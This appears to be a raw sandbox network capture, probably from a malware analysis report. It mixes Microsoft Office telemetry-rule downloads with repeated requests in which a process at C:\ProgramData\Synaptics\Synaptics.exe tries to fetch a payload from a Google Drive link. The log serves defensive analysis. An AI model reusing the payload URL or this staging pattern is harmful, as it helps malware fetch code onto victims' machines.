                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
2024-12-05 21:50:49 UTC  472                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
97          192.168.2.5  49891        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:49 UTC  192                OUT        GET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
2024-12-05 21:50:49 UTC  470                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 432
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                        x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdb8xvchC1EWRmbd400000003ag000000001tm8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
2024-12-05 21:50:49 UTC  432                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
98          192.168.2.5  49892        172.217.19.238  443               2180  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:49 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:50 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GerI1bcs6zI7i3Xa5DB5tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
99          192.168.2.5  49893        142.250.181.129  443               2180  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:49 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
2024-12-05 21:50:50 UTC  1253               IN         HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eS6xHG_99f5UpXjpFHLNdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6qjrilpL4icqobZaAxP-5gdPRpTwsNCMsET-bba3wyBsJOQfsrOncRX0r2S4J1Sh3T3ev9hu59Aw
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
2024-12-05 21:50:50 UTC  137                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
2024-12-05 21:50:50 UTC  1390               IN         Data Ascii: or 404 (Not Found)!!1</title><style nonce="c3A8JAfQanX4XPeDWHYLsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
2024-12-05 21:50:50 UTC  125                IN         Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
100         192.168.2.5  49895        142.250.181.129  443               2180  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-05 21:50:49 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
2024-12-05 21:50:50 UTC  1253               IN         HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-A8PAKgl1jFgw8q0UxuVSCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4KmJk45XUGCAkk-EvYORAtEnL8KQFsZAV7e2Tn6hBbPNkEbrRzWeXiufKmcZuKNcOnIxDr8U1S9Q
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:50 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:50 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 44 5f 70 6e 57 77 4e 7a 4c 44 63 69 73 71 4d 74 63 4f 59 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="zD_pnWwNzLDcisqMtcOYNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:50 UTC | 125 | IN | Data:
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        101 | 192.168.2.5 | 49896 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:49 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:50 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA740822"
                                                                                        x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bd4w8sthC1EWR7004000000031g00000000e82f
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:50 UTC | 475 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        102 | 192.168.2.5 | 49897 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:49 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:50 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                        ETag: "0x8DC582BB464F255"
                                                                                        x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215049Z-1746fd949bdqpttnhC1EWRe1wg00000002zg00000000pv7g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:50 UTC | 427 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        103 | 192.168.2.5 | 49894 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:49 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yJ8saXNhHV6gGxbTu7QxfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        104 | 192.168.2.5 | 49900 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:50 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                        x-ms-request-id: 74f9eb57-201e-003c-3ec2-4630f9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdqpttnhC1EWRe1wg000000030000000000kxr0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:51 UTC | 474 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        105 | 192.168.2.5 | 49901 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:51 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                        x-ms-request-id: 859f66ca-901e-005b-0ccc-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdtlp5chC1EWRq1v4000000036000000000qbc0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC | 419 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        106 | 192.168.2.5 | 49902 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:51 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B984BF177"
                                                                                        x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdfg4slhC1EWR34t0000000034g00000000hsvw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC | 472 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        107 | 192.168.2.5 | 49903 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:51 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                        x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215052Z-1746fd949bdqpttnhC1EWRe1wg000000031000000000f07q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC | 468 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        108 | 192.168.2.5 | 49904 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:51 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 405
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                        x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215052Z-1746fd949bdwt8wrhC1EWRu6rg00000003ag00000000xqk4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC | 405 | IN | Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        109 | 192.168.2.5 | 49910 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:52 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-N_-JelL3M6P17mf59pCcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        110 | 192.168.2.5 | 49911 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:52 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
